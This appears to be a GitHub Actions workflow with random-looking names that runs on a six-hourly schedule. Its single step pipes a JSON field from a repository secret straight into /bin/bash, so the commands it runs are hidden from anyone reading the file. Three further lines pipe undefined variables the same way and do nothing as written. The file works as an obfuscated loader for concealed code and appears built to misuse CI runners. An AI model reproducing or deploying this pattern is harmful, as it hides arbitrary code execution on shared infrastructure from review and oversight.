name: shisuanjian3489

on:
  workflow_dispatch:
  schedule:
    - cron: '24 0/6 * * *'
jobs:  # 7480
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shisuanjian3489
        env:
          ztzb654: ${{ secrets.ztzb654 }}
        run: |
          echo $ztzb654 | jq -r .m5 | /bin/bash
          echo $wna70629 | jq -r .twsqd911 | /bin/bash
          echo $vp53 | jq -r .nucj85854 | /bin/bash
          echo $xp3 | jq -r .mew303 | /bin/bash

